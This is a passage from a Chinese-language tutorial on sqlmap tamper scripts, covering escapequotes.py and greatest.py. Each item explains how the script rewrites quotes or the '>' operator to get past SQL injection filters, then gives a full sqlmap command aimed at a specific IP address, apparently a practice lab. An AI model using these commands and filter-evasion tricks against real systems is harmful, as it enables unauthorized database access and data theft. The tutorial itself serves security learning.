16. escapequotes.py腳本
将單引号轉換成\', 雙引号就轉換成\\" ,一般這種情況是用于過濾了單引号或者是雙引号的情況下,适用于所有資料庫
實戰示範:
測試位址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="escapequotes.py" --proxy="http://127.0.0.1:8080" -batch
![](https://img.laitimes.com/img/_0nNw4CM6IyYiwiM6ICdiwiI0gTMx81dsQWZ4lmZf1GLlpXazVmcvwFciV2dsQXYtJ3bm9CX9s2RkBnVHFmb1clWvB3MaVnRtp1XlBXe0xCMy81dvRWYoNHLwEzX5xCMx8FesU2cfdGLwMzX0xiRGZkRGZ0Xy9GbvNGLpZTY1EmMZVDUSFTU4VFRR9Fd4VGdsYTMfVmepNHLrJXYtJXZ0F2dvwVZnFWbp1zczV2YvJHctM3cv1Ce-cmbw5yNygTM3QjZxMmNxYTZ5EjYyYzX1AzMzgTMxIzLcZDMyIDMy8CXn9Gbi9CXzV2Zh1WavwVbvNmLvR3YxUjLyM3Lc9CX6MHc0RHaiojIsJye.png)
發現并沒有注入成功,嘗試看看brup的抓包情況
發現是針對單引号成功加入了反斜杠
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
17. greatest.py腳本
使用GREATEST函數替換大于号">" ,比如:"1 and bmfx > bmfxx" 替換為"1 and greatest(bmfx,bmfxx+1)=bmfx" 适用于所有資料庫
實戰示範:
測試位址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="greatest.py" --proxy="http://127.0.0.1:8080" -batch
發現這個繞過參數是可以注入的